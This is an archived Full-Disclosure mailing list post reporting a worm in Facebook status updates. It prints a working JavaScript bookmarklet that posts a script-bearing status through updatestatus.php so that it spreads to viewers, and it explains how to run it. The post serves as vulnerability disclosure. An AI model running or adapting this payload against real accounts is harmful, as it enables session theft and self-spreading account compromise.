[Full-disclosure] F4c3b00k Worm



Seems to be able to spread via automated status messages. When
another user sees the hijacked status message, they are likely to
execute the status updater payload as well, which then spreads to
anyone else who can see those status updates. This document.cookie
payload is benign. Emulation is achieved by pasting the payload below
into Firefox while on the profile.php page...

javascript:var p='profile_id='+document.getElementById('profile_id').value+'&status=<script>alert(document.cookie);</script>'+'&profile=true'+'&test_name=INLINE_STATUS_EDITOR'+'&action=OTHER_UPDATE'+'&post_form_id='+document.getElementById('post_form_id').value;hr=new
XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST',
'updatestatus.php', true);hr.setRequestHeader('Content-type',
'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length',
p.length);hr.setRequestHeader('Connection', 'close');hr.send(p);
--
Kristian Erik Hermansen

Have you tried Session Destroyer yet?
<http://kristian.hermansen.googlepages.com/session.destroyer.html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Re: How to get a reverse Shell / VNC from a writable directory on a remote web server.
    ... Execute the standalone payload stager on the target system. ... This process has been tested with most of the win32 Metasploit payloads, ... WLAN by understanding these threats, ...
    (Pen-Test)
  • Passing Variable Types back to clients
    ... I am currently working on a WS project where we want to execute a varable ... incoming message called action Name that would state which action to ... Based on that incoming message I want to return a xml document that looks ... Payload is a variable xml Document and I have attached that document by ...
    (microsoft.public.dotnet.framework.webservices)
  • Win32 Shellcode question.
    ... I was writing an exploit for the MS03-049 services.exe stack overflow ... payload - meaning I have control over the CPU's exec path, ... it execute my payload. ...
    (Vuln-Dev)

Quantcast